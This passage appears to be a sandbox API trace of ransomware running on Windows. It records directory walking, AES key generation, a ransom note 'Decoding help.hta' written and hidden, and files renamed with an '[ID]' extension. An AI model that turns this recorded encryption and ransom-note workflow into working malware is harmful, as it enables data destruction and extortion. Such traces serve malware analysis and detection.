oledb\\10\\cartridges\\as80.xsl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc2c [0058.427] CreateFileMappingA (hFile=0xc2c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc30 [0058.427] CryptAcquireContextA (in: phProv=0x2204fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2204fcec*=0x2aac6220) returned 1 [0060.215] CryptGenKey (in: hProv=0x2aac6220, Algid=0x6610, dwFlags=0x1, phKey=0x2204fce8 | out: phKey=0x2204fce8*=0x5fca7a0) returned 1 [0060.215] CryptExportKey (in: hKey=0x5fca7a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2204fbe4, pdwDataLen=0x2204fce4 | out: pbData=0x2204fbe4*, pdwDataLen=0x2204fce4*=0x2c) returned 1 [0060.215] MapViewOfFile (hFileMappingObject=0xc30, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4360) returned 0x4490000 Thread: id = 507 os_tid = 0xc30 [0047.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x2218fd30 | out: lpFindFileData=0x2218fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 508 os_tid = 0xc34 [0047.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Triedit\\en-US\\*.*", lpFindFileData=0x222cfd30 | out: lpFindFileData=0x222cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671eb0 [0047.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.246] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x222cfd30 | out: lpFindFileData=0x222cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.246] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0x222cfd30 | out: lpFindFileData=0x222cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.246] FindClose (in: hFindFile=0x671eb0 | out: hFindFile=0x671eb0) returned 1 Thread: id = 509 os_tid = 0xc38 [0047.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*", lpFindFileData=0x2240fd30 | out: lpFindFileData=0x2240fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671e70 [0047.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.262] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x2240fd30 | out: lpFindFileData=0x2240fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.262] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.262] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x2240fd30 | out: lpFindFileData=0x2240fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0", cAlternateFileName="")) returned 1 [0047.262] lstrcmpW (lpString1=".", lpString2="2.0") returned -1 [0047.262] lstrcmpW (lpString1="..", lpString2="2.0") returned -1 [0047.262] lstrcmpiW (lpString1="windows", lpString2="2.0") returned 1 [0047.262] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*" [0047.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*") returned 56 [0047.262] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\", lpString2="2.0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0" [0047.262] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*" [0047.262] GlobalMemoryStatus (in: lpBuffer=0x2240fd10 | out: lpBuffer=0x2240fd10) [0047.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c26660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x440 [0047.275] CloseHandle (hObject=0x440) returned 1 [0047.275] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x2240fd30 | out: lpFindFileData=0x2240fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0", cAlternateFileName="")) returned 0 [0047.275] FindClose (in: hFindFile=0x671e70 | out: hFindFile=0x671e70) returned 1 Thread: id = 510 os_tid = 0xc3c [0047.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*", lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b50 [0050.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.393] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.393] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.393] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0050.393] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0050.393] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0050.393] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0050.394] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*" [0050.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*") returned 60 [0050.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat" [0050.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*" [0050.394] GlobalMemoryStatus (in: lpBuffer=0x2254fd10 | out: lpBuffer=0x2254fd10) [0050.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d9ec88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0050.395] CloseHandle (hObject=0x3d4) returned 1 [0050.395] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0050.395] lstrcmpW (lpString1=".", lpString2="Linguistics") returned -1 [0050.395] lstrcmpW (lpString1="..", lpString2="Linguistics") returned -1 [0050.395] lstrcmpiW (lpString1="windows", lpString2="Linguistics") returned 1 [0050.395] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*" [0050.395] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*") returned 60 [0050.395] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\", lpString2="Linguistics" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics" [0050.395] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*.*" [0050.395] GlobalMemoryStatus (in: lpBuffer=0x2254fd10 | out: lpBuffer=0x2254fd10) [0050.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10db6cf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0050.396] CloseHandle (hObject=0x3d4) returned 1 [0050.396] FindNextFileW (in: hFindFile=0x5d8b50, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0050.396] FindClose (in: hFindFile=0x5d8b50 | out: hFindFile=0x5d8b50) returned 1 Thread: id = 511 os_tid = 0xc40 [0047.289] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*.*", lpFindFileData=0x2268fd30 | out: lpFindFileData=0x2268fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a58b0 [0047.289] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.289] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x2268fd30 | out: lpFindFileData=0x2268fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.289] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.289] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x2268fd30 | out: lpFindFileData=0x2268fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.289] FindClose (in: hFindFile=0x5a58b0 | out: hFindFile=0x5a58b0) returned 1 Thread: id = 512 os_tid = 0xc44 [0047.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*", lpFindFileData=0x227cfd30 | out: lpFindFileData=0x227cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e36b0 [0049.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.447] FindNextFileW (in: hFindFile=0x5e36b0, lpFindFileData=0x227cfd30 | out: lpFindFileData=0x227cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.447] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.447] FindNextFileW (in: hFindFile=0x5e36b0, lpFindFileData=0x227cfd30 | out: lpFindFileData=0x227cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7818f1c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc7818f1c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc7818f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x57000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0049.659] lstrcpyW (in: lpString1=0x10d36a90, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*" [0049.659] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*") returned 68 [0049.659] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Decoding help.hta" [0049.659] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\decoding help.hta")) returned 0xffffffff [0049.659] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b0 [0051.179] WriteFile (in: hFile=0x4b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x227cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x227cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.010] CloseHandle (hObject=0x4b0) returned 1 [0055.312] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.143] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Ink.dll") returned -1 [0058.143] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0058.143] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*" [0058.143] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*.*") returned 68 [0058.143] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\", lpString2="Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" [0058.143] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" [0058.143] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\microsoft.ink.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.144] FindNextFileW (in: hFindFile=0x5e36b0, lpFindFileData=0x227cfd30 | out: lpFindFileData=0x227cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7818f1c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc7818f1c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc7818f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x57000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 0 [0058.144] FindClose (in: hFindFile=0x5e36b0 | out: hFindFile=0x5e36b0) returned 1 Thread: id = 513 os_tid = 0xc48 [0047.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*", lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da278 [0047.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.319] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.320] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.320] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.320] FindNextFileW (in: hFindFile=0x5da278, lpFindFileData=0x2290fd30 | out: lpFindFileData=0x2290fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0047.320] lstrcmpW (lpString1=".", lpString2="CryptnetUrlCache") returned -1 [0047.320] lstrcmpW (lpString1="..", lpString2="CryptnetUrlCache") returned -1 [0047.320] lstrcmpiW (lpString1="windows", lpString2="CryptnetUrlCache") returned 1 [0047.320] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") 